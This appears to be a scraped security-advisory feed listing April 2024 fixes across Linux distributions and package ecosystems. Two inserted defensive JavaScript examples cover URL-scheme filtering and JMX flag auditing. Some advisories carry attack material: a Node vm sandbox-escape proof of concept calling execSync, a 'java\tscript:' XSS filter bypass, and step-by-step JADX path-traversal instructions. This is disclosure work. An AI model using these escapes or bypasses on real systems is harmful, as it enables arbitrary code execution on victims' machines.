TBH this is quite a niche edge case, so I don't know if this even warrants a security report.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-23Q2-5GF8-GJPP
19.04.2024 17:04:04 | ubuntu | [USN-6743-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6743-1

19.04.2024 16:51:13 | ubuntu | [USN-6742-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6742-1

19.04.2024 16:42:12 | ubuntu | [USN-6741-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6741-1

19.04.2024 16:32:30 | ubuntu | [USN-6740-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6740-1

19.04.2024 16:23:13 | ubuntu | [USN-6739-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6739-1

19.04.2024 03:00:00 | debian | [DSA-5666-1] flatpak (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5666-1

19.04.2024 03:00:00 | debian | [DSA-5667-1] tomcat9 (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5667-1
19.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1908] firefox security update (important)

[115.10.0-1.0.1]
- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file
[115.10.0-1]
- Update to 115.10.0 build1

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1908

19.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1912] firefox security update (important)

[115.10.0-1.0.1]
- Change default prefs file to Oracle version
[115.10.0-1]
- Update to 115.10.0 build1

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1912

19.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1825] java-17-openjdk security update (moderate)

[17.0.11.0.9-2.0.1]
- Add Oracle vendor bug URL
[1:17.0.11.0.9-2]
- Update to jdk-17.0.11+9 (GA)
- Add openjdk-17.0.11+9.tar.xz to .gitignore
- Sync java-17-openjdk-portable.specfile from openjdk-portable-rhel-8
- Update buildver from 7 to 9
- Update portablerelease from 1 to 3
- Change is_ga from 0 to 1 to enable GA mode for release
- Update tzdata Requires comment to mention that 2024a is not yet in the buildroot
- Update tzdata BuildRequires comment to mention that 2024a is not yet in the buildroot
- Update tzdata BuildRequires from 2023c to 2023d
- Update sources from openjdk-17.0.11+7-ea.tar.xz to openjdk-17.0.11+9.tar.xz
- Resolves: RHEL-30939
- ** This tarball is embargoed until 2024-04-16 @ 1pm PT. **
[1:17.0.11.0.7-0.2.ea]
- Update to jdk-17.0.11+7 (EA)
- Update buildjdkver to match the featurever
- Use featurever macro to specify fips patch
- Explain patchN syntax situation in a comment
- Sync generate_source_tarball.sh
- Require tzdata 2023d (JDK-8322725)
- openjdk_news.sh: Use grep -E instead of egrep
- Remove RH1649512 patch for libjpeg-turbo FAR macro
- Move pcsc-lite-libs patch to in-need-of-upstreaming section
- Related: RHEL-30939

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1825
19.04.2024 18:40:04 | rustsec | [RUSTSEC-2024-0336] `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input

If a `close_notify` alert is received during a handshake, `complete_io` does not terminate.

Callers which do not call `complete_io` are not affected. `rustls-tokio` and `rustls-ffi` do not call `complete_io` and are not affected.

`rustls::Stream` and `rustls::StreamOwned` types use `complete_io` and are affected.

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0336
18.04.2024 22:23:18 | slackware | [SSA:2024-109-01] glibc

New glibc packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/aaa_glibc-solibs-2.33-i586-6_slack15.0.txz: Rebuilt.
patches/packages/glibc-2.33-i586-6_slack15.0.txz: Rebuilt.
  This update fixes a security issue:
  The iconv() function in the GNU C Library versions 2.39 and older may
  overflow the output buffer passed to it by up to 4 bytes when converting
  strings to the ISO-2022-CN-EXT character set, which may be used to crash an
  application or overwrite a neighbouring variable.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-2961
  (* Security fix *)
patches/packages/glibc-i18n-2.33-i586-6_slack15.0.txz: Rebuilt.
patches/packages/glibc-profile-2.33-i586-6_slack15.0.txz: Rebuilt.
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/aaa_glibc-solibs-2.33-i586-6_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-2.33-i586-6_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-i18n-2.33-i586-6_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-profile-2.33-i586-6_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/aaa_glibc-solibs-2.33-x86_64-6_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-2.33-x86_64-6_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-i18n-2.33-x86_64-6_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-profile-2.33-x86_64-6_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/aaa_glibc-solibs-2.39-i586-2.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.39-i586-2.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.39-i586-2.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.39-i586-2.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/aaa_glibc-solibs-2.39-x86_64-2.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.39-x86_64-2.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.39-x86_64-2.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.39-x86_64-2.txz

**MD5 signatures**

Slackware 15.0 package:
db1fdb65d9e64639b11f35a0b6b150b7  aaa_glibc-solibs-2.33-i586-6_slack15.0.txz
ac723131a3e18c7220bff020d4597bf8  glibc-2.33-i586-6_slack15.0.txz
f3b70a54eb163e043c4c5f6a67e9d0e9  glibc-i18n-2.33-i586-6_slack15.0.txz
6b98c77321151022d17312825436be7f  glibc-profile-2.33-i586-6_slack15.0.txz

Slackware x86_64 15.0 package:
b2476b8368bef6a3ef0eaca4eb8d3db6  aaa_glibc-solibs-2.33-x86_64-6_slack15.0.txz
e36a2bd9e8c8ea38fd64df24baf61e36  glibc-2.33-x86_64-6_slack15.0.txz
9e7970f2775d7127ac618296c0884109  glibc-i18n-2.33-x86_64-6_slack15.0.txz
eb39636b73e2fd695ab8cf8850050889  glibc-profile-2.33-x86_64-6_slack15.0.txz

Slackware -current package:
eac98c14f059ea434e655ec6c3e35afd  a/aaa_glibc-solibs-2.39-i586-2.txz
7bd0e24e064cabdad278b1baf8c380e2  l/glibc-2.39-i586-2.txz
7e280ef1dfff11b34adf258c6e8301b3  l/glibc-i18n-2.39-i586-2.txz
ca5fb64de16d846cd1ef6bf845c50cc3  l/glibc-profile-2.39-i586-2.txz

Slackware x86_64 -current package:
86d02cbc3ce60f1ba2e31e334ad8f84f  a/aaa_glibc-solibs-2.39-x86_64-2.txz
032540c006e8015368d71fb98f6a1bc0  l/glibc-2.39-x86_64-2.txz
d5a77e36486fcf60c8fb89f45635d752  l/glibc-i18n-2.39-x86_64-2.txz
caba19659a85eb38cc0e8692f4d89efa  l/glibc-profile-2.39-x86_64-2.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg *glibc-*.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-109-01
18.04.2024 20:15:53 | suse | [SUSE-SU-2024:1345-1] Security update for tomcat (important)
Security update for tomcat
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1345-1

18.04.2024 19:58:18 | npm | [NPM:GHSA-JJFF-Q3Q4-5HH8] @andrei-tatar/nora-firebase-common Prototype Pollution vulnerability (high)
An issue in andrei-tatar nora-firebase-common between v.1.0.41 and v.1.12.2 allows a remote attacker to execute arbitrary code via a crafted script to the updateState parameter of the updateStateInternal method.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JJFF-Q3Q4-5HH8

18.04.2024 16:04:08 | suse | [SUSE-SU-2024:1340-1] Security update for pgadmin4 (important)
Security update for pgadmin4
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1340-1

18.04.2024 14:58:27 | ubuntu | [USN-6737-1] GNU C Library vulnerability
GNU C Library could be made to crash or run programs if it processed specially crafted data.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6737-1

18.04.2024 13:27:13 | almalinux | [ALSA-2024:1879] gnutls security update (moderate)
gnutls security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1879

18.04.2024 13:28:16 | almalinux | [ALSA-2024:1872] mod_http2 security update (important)
mod_http2 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1872

19.04.2024 16:03:54 | almalinux | [ALSA-2024:1818] java-1.8.0-openjdk security update (moderate)
java-1.8.0-openjdk security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1818

18.04.2024 16:46:24 | almalinux | [ALSA-2024:1825] java-17-openjdk security update (moderate)
java-17-openjdk security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1825
19.04.2024 22:24:09 | rubysec | [RUBYSEC:PHLEX-2024-32463] Cross-site Scripting (XSS) possible due to improper sanitisation of `href` attributes on `<a>` tags (high)

### Summary

There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data.

Our filter to detect and prevent the use of the `javascript:` URL scheme in the `href` attribute of an `<a>` tag could be bypassed with tab `\t` or newline `\n` characters between the characters of the protocol, e.g. `java\tscript:`.

### Impact

If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.

```ruby
a(href: user_profile) { "Profile" }
```

### Mitigation

The best way to mitigate this vulnerability is to update to one of the following versions:

- [1.10.1](https://rubygems.org/gems/phlex/versions/1.10.1)
- [1.9.2](https://rubygems.org/gems/phlex/versions/1.9.2)
- [1.8.3](https://rubygems.org/gems/phlex/versions/1.8.3)
- [1.7.2](https://rubygems.org/gems/phlex/versions/1.7.2)
- [1.6.3](https://rubygems.org/gems/phlex/versions/1.6.3)
- [1.5.3](https://rubygems.org/gems/phlex/versions/1.5.3)
- [1.4.2](https://rubygems.org/gems/phlex/versions/1.4.2)

### Workarounds

Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-2024-32463
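Added example, not Phlex code, for the two Phlex entries above (RUBYSEC:PHLEX-G7XQ-XV8C-H98C and RUBYSEC:PHLEX-2024-32463): a scheme filter of the naive kind the advisory describes, next to a hardened one that applies the same normalisation the WHATWG URL parser applies (strip leading and trailing C0 controls and spaces, then delete ASCII tab and newline everywhere) before reading the scheme, plus a cross-check that asks the platform parser which scheme it actually sees. The function names, the scheme allowlist and the `https://example.invalid/` base URL are assumptions of this example.

```javascript
// Added example (not Phlex code). A browser strips leading/trailing C0
// controls and spaces and deletes every ASCII tab and newline before it reads
// the scheme, so "java\tscript:" is run as javascript: even though a filter
// comparing the raw string never sees that prefix.

// Naive filter: rejects only an href that literally starts with "javascript:".
function naiveSafeHref(href) {
  return !String(href).toLowerCase().startsWith('javascript:');
}

// Schemes this example allows (assumption); any other explicit scheme is
// rejected, which also covers data: and vbscript:, not just javascript:.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto', 'tel']);

function hardenedSafeHref(href) {
  let s = String(href);
  // Strip leading and trailing C0 control or space characters (U+0000..U+0020).
  s = s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  // Delete ASCII tab, LF and CR anywhere in the string.
  s = s.replace(/[\t\n\r]/g, '');
  // No "scheme:" prefix means a relative URL, which cannot carry a script scheme.
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  if (m === null) return true;
  return SAFE_SCHEMES.has(m[1].toLowerCase());
}

// Cross-check against the platform parser: new URL() applies the same
// normalisation, so its .protocol is the scheme the browser will act on.
// The base URL stands in for the page origin (assumption of this example).
function browserProtocol(href) {
  try {
    return new URL(String(href), 'https://example.invalid/').protocol;
  } catch {
    return null;
  }
}
```

Allowlisting schemes rather than denylisting `javascript:` is the robust choice; its cost is that a relative link such as `profile:42` is rejected as an unknown scheme, so the list has to match what the application actually links to.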
18.04.2024 11:41:52 | composer | [PHP:TIMBER-TIMBER-2024-29800] Deserialization of Untrusted Data in timber/timber
https://secdb.nttzen.cloud/security-advisory/composer/PHP:TIMBER-TIMBER-2024-29800

20.04.2024 03:00:00 | debian | [DSA-5668-1] chromium (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5668-1

20.04.2024 05:21:14 | rustsec | [RUSTSEC-2024-0336] `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input (high)

If a `close_notify` alert is received during a handshake, `complete_io` does not terminate.

Callers which do not call `complete_io` are not affected. `rustls-tokio` and `rustls-ffi` do not call `complete_io` and are not affected.

`rustls::Stream` and `rustls::StreamOwned` types use `complete_io` and are affected.

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0336

22.04.2024 22:44:32 | slackware | [SSA:2024-113-01] freerdp

New freerdp packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/freerdp-2.11.7-i586-1_slack15.0.txz: Upgraded.
  This release eliminates a bunch of issues detected during oss-fuzz runs.
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/freerdp-2.11.7-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/freerdp-2.11.7-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/freerdp-2.11.7-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/freerdp-2.11.7-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
a0177def144b59c5fb50bcf16c7057a1  freerdp-2.11.7-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
cdaaa114d71ccba1781a5013c1652333  freerdp-2.11.7-x86_64-1_slack15.0.txz

Slackware -current package:
655ffad59655b5132d847929537bfe5a  xap/freerdp-2.11.7-i586-1.txz

Slackware x86_64 -current package:
491dbe29629ec598cf46cce0b85d99e7  xap/freerdp-2.11.7-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg freerdp-2.11.7-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-113-01
22.04.2024 21:38:14 | npm | [NPM:GHSA-QMMM-73R2-F8XR] @hoppscotch/cli affected by Sandbox Escape in @hoppscotch/js-sandbox leads to RCE (high)

### Observations

The Hoppscotch desktop app takes multiple precautions to be secure against arbitrary JavaScript and system command execution. It does not render user-controlled HTML or Markdown, uses Tauri instead of Electron, and sandboxes pre-request scripts with a simple yet secure implementation using web workers.

Unfortunately, web workers are not available in a pure Node.js application like Hoppscotch CLI. That is why the [@hoppscotch/js-sandbox](https://github.com/hoppscotch/hoppscotch/tree/main/packages/hoppscotch-js-sandbox) package also provides a JavaScript sandbox that uses the Node.js `vm` module. However, the `vm` module is not safe for sandboxing untrusted JavaScript code, as stated [in the documentation](https://nodejs.org/api/vm.html#vm-executing-javascript). This is because [code inside the vm context can break out](https://thegoodhacker.com/posts/the-unsecure-node-vm-module/) if it can get hold of any reference to an object created outside of the vm.

In the case of @hoppscotch/js-sandbox, multiple references to external objects are passed into the vm context to let pre-request scripts interact with environment variables and more. But this also allows the pre-request script to escape the sandbox.

[packages/hoppscotch-js-sandbox/src/pre-request/node-vm/index.ts](https://github.com/hoppscotch/hoppscotch/blob/faab1d20fde9a6be660db40fc73dcf28f9038008/packages/hoppscotch-js-sandbox/src/pre-request/node-vm/index.ts#L23-L31)

```js
const { pw, updatedEnvs } = getPreRequestScriptMethods(envs)

// Expose pw to the context
context.pw = pw
context.atob = atob
context.btoa = btoa

// Run the pre-request script in the provided context
runInContext(preRequestScript, context)
```

### Exploitation

An attacker can use the exposed `pw` object reference to escape the sandbox and execute arbitrary system commands using the `child_process` Node.js module. This PoC pre-request script executes the `id > /tmp/pwnd` system command as soon as a request is sent.

```js
outside = pw.constructor.constructor('return this')()
outside.process.mainModule.require('child_process').execSync('id > /tmp/pwnd')
```

An attacker who wants to run arbitrary code on the machine of a victim can create a Hoppscotch collection containing a request with a malicious pre-request script and share it with a victim, using the JSON export feature. The victim then has to run the collection with the Hoppscotch CLI. Then the malicious pre-request script executes.

### Impact

This attack gives an attacker arbitrary command execution on the machine of a victim Hoppscotch CLI user. For the attack to succeed, an attacker has to lure the victim into downloading a malicious Hoppscotch collection and running it with the Hoppscotch CLI.

This issue does not impact Hoppscotch Web or Desktop, as they use the safe web worker sandboxing approach.

### Recommendations

Hoppscotch CLI and other tools that rely on @hoppscotch/js-sandbox but don't have access to a browser cannot use the web worker sandbox. For these, you can look into other safe JavaScript sandboxing libraries. We think that [isolated-vm](https://github.com/laverdet/isolated-vm) looks promising. We discourage the use of [vm2](https://github.com/patriksimek/vm2), which is deprecated because it has arbitrary bypasses.

Alternatively, you can introduce an `--enable-scripting` flag for the CLI and disable scripting by default. Or you can change the threat model and educate users that they should not run untrusted collections, as that can lead to RCE.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QMMM-73R2-F8XR
22.04.2024 20:40:26 | ubuntu | [USN-6743-2] Linux kernel (Low Latency) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6743-2
22.04.2024 18:56:06 | maven | [MAVEN:GHSA-HVP5-5X4F-33FQ] JADX file override vulnerability (low)

### Summary

When jadx parses a resource file, there is an escape problem with the style file, which can overwrite other files in the directory when saving the decompile result.

Although I don't think this vulnerability realizes path traversal in the true sense of the word, I reported it anyway.

### Details

I see that getResAlias does something with the filename.

```java
private String getResAlias(int resRef, String origKeyName, @Nullable FieldNode constField) {
```

but type style will return the original filename directly.

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232212491.jpeg)

so our goal is to take a malicious file that was originally of type raw, modify its type to style, trick jadx into

#### step1

create an android project using androidstudio and create a raw folder with the name attack_file_sayhiiiiiiiiiiiii, it doesn't matter what the content is!

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232212073.jpg)

generate an initial APK

#### step2

extract this initial APK using ZIP software to get resources.arsc

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232212841.jpg)

drop resources.arsc into 010editor

#### step3

search for the previous filename attack_file_sayhiiiiiiiiiiiii, two will appear here, we choose the second one

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213527.jpg)

let's change the name of the file here. I'll change it to ../../_file_sayhiiiiiiiiiiiii

note that you can only overwrite files in the folder where the decompile was saved.

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213343.jpg)

#### step4

change the type of this file to style

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213183.jpg)

modified to 0E

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213484.jpg)

#### step5

After saving, re-compress the whole folder into a zip, then change the extension to APK.

open it with JADX and you can see that it has been changed to a style type.

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213864.jpg)

click save all

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213119.jpg)

you can see the file escaping.

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213746.jpg)

so we can also construct a

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213497.jpg)

so the classes.dex file is also replaced here

![img](https://quan9i.oss-cn-beijing.aliyuncs.com/img/202401232213075.jpg)

### PoC

the details above have been written

### Impact

latest version

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HVP5-5X4F-33FQ
22.04.2024 18:52:01 | maven | [MAVEN:GHSA-QWHW-HH9J-54F5] Ant Media Server vulnerable to a local privilege escalation (high)

### Impact

We have identified a local privilege escalation vulnerability in Ant Media Server which allows any unprivileged operating system user account to escalate privileges to the root user account on the system. This vulnerability arises from Ant Media Server running with Java Management Extensions (JMX) enabled and authentication disabled on localhost on port 5599/TCP. This vulnerability is nearly identical to the local privilege escalation vulnerability CVE-2023-26269 identified in Apache James.

Any unprivileged operating system user can connect to the JMX service running on port 5599/TCP on localhost and leverage the MLet Bean within JMX to load a remote MBean from an attacker-controlled server. This allows an attacker to execute arbitrary code within the Java process run by Ant Media Server and execute code within the context of the “antmedia” service account on the system.

### Patches

2.9.0

### Workarounds

Remove the following parameters from the antmedia.service file:

```
-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.port=5599 -Dcom.sun.management.jmxremote.local.only=true -Dcom.sun.management.jmxremote.host=127.0.0.1 -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useLocalHostname=true -Dcom.sun.management.jmxremote.rmi.port=5599
```

Thank you [Adam Crosser](https://www.linkedin.com/in/adam-crosser-366263265/) for reporting the issue.

[Local Privilege Escalation via Unauthenticated JMX Remote Management Interface (1).pdf](https://github.com/ant-media/Ant-Media-Server/files/15059667/Local.Privilege.Escalation.via.Unauthenticated.JMX.Remote.Management.Interface.1.pdf)

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QWHW-HH9J-54F5
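Added example, not Ant Media code: a check for the flag set listed in the workaround above, read from a systemd unit's `ExecStart` line, and the same unit with those flags stripped. The unit text is constructed for the example (the real file is antmedia.service, and its jar path here is invented); the function names are assumptions.

```javascript
// Added example (not Ant Media code). Constructed unit text carrying the
// advisory's flag set; the jar path is invented for the example.
const SAMPLE_UNIT = `[Service]
ExecStart=/usr/bin/java -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.port=5599 -Dcom.sun.management.jmxremote.local.only=true -Dcom.sun.management.jmxremote.host=127.0.0.1 -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useLocalHostname=true -Dcom.sun.management.jmxremote.rmi.port=5599 -jar /usr/local/antmedia/ant-media-server.jar`;

// Returns the JVM system properties (-Dname=value) on the ExecStart line as a Map.
function jvmProperties(unitText) {
  const line = unitText.split('\n').find((l) => l.startsWith('ExecStart='));
  const props = new Map();
  if (!line) return props;
  for (const tok of line.split(/\s+/)) {
    const m = /^-D([^=]+)(?:=(.*))?$/.exec(tok);
    if (m) props.set(m[1], m[2] === undefined ? '' : m[2]);
  }
  return props;
}

// The finding: a JMX listener with authentication switched off. local.only=true
// keeps it off the network but not away from other local users, which is the
// boundary this advisory crosses.
function auditJmx(unitText) {
  const p = jvmProperties(unitText);
  return {
    port: p.get('com.sun.management.jmxremote.port') || null,
    unauthenticated: p.get('com.sun.management.jmxremote.authenticate') === 'false',
    localOnly: p.get('com.sun.management.jmxremote.local.only') === 'true',
  };
}

// The advisory's workaround: drop every jmxremote and java.rmi.server property
// from ExecStart and leave the rest of the unit untouched.
function stripJmxFlags(unitText) {
  return unitText
    .split('\n')
    .map((l) => (l.startsWith('ExecStart=')
      ? l.replace(/\s-D(?:com\.sun\.management\.jmxremote|java\.rmi\.server)[^\s]*/g, '')
      : l))
    .join('\n');
}
```

If JMX has to stay on, the alternative to stripping it is `authenticate=true` with the password and access files JMX expects, so that a localhost listener is no longer open to every local account.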
22.04.2024 21:37:59 | maven | [MAVEN:GHSA-6MGP-P75R-VHJM] Apache HugeGraph-Server: Bypass whitelist in Auth mode (high)
Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0. Users are recommended to upgrade to version 1.3.0, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6MGP-P75R-VHJM

22.04.2024 21:37:54 | maven | [MAVEN:GHSA-29RC-VQ7F-X335] Apache HugeGraph-Server: Command execution in gremlin (critical)
RCE (Remote Command Execution) vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11. Users are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-29RC-VQ7F-X335

22.04.2024 21:37:46 | maven | [MAVEN:GHSA-77X4-55Q7-4VMJ] Apache HugeGraph-Hubble: SSRF in Hubble connection page (high)
Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble. This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0. Users are recommended to upgrade to version 1.3.0, which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-77X4-55Q7-4VMJ

22.04.2024 16:46:57 | ubuntu | [USN-6744-2] Pillow vulnerability (medium)
Pillow could be made to crash or run programs as an administrator if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6744-2

22.04.2024 14:12:02 | ubuntu | [USN-6745-1] Percona XtraBackup vulnerability (high)
percona-xtrabackup could be made to run programs as your login if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6745-1

22.04.2024 12:47:43 | ubuntu | [USN-6738-1] LXD vulnerability (medium)
LXD could be made to bypass integrity checks if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6738-1

22.04.2024 12:25:43 | ubuntu | [USN-6744-1] Pillow vulnerability (medium)
Pillow could be made to crash or run programs as an administrator if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6744-1

22.04.2024 03:00:00 | debian | [DSA-5669-1] guix (medium)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5669-1

22.04.2024 03:00:00 | debian | [DSA-5670-1] thunderbird
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5670-1

22.04.2024 03:00:00 | debian | [DSA-5671-1] openjdk-11 (low)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5671-1

22.04.2024 03:00:00 | debian | [DSA-5672-1] openjdk-17 (low)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5672-1
22.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1831] kernel security update (important)

[2.6.32-754.53.1.OL6]
- net/sched: sch_qfq: refactor parsing of netlink parameters [Orabug: 36517546]
- net/sched: sch_qfq: account for stab overhead in qfq_enqueue {CVE-2023-3611} [Orabug: 36517546]
- net/sched: cls_fw: Fix improper refcount update leads to use-after-free {CVE-2023-3776} [Orabug: 36517546]
- net: sched: sch_qfq: Fix UAF in qfq_dequeue() {CVE-2023-4921} [Orabug: 36517546]
- net: sched: sch_qfq: prevent slab-out-of-bounds in qfq_activate_agg {CVE-2023-31436} [Orabug: 36517546]

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1831

22.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1935] thunderbird security update (low)

[115.10.0-2.0.1]
- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js
- Enabled aarch64 build
[115.10.0-2]
- Update to 115.10.0 build2
[115.10.0-1]
- Update to 115.10.0 build1
- Revert expat CVE-2023-52425 fix

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1935

22.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1939] thunderbird security update (low)

[115.10.0-2.0.1]
- Add Oracle prefs
[115.10.0]
- Add OpenELA debranding
[115.10.0-2]
- Update to 115.10.0 build2
[115.10.0-1]
- Update to 115.10.0 build1
- Revert expat CVE-2023-52425 fix

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1939

22.04.2024 03:00:00 | oraclelinux | [ELSA-2024-1821] java-11-openjdk security update (moderate)

[1:11.0.23.0.9-2.0.1]
- link atomic for ix86 build
[1:11.0.23.0.9-2]
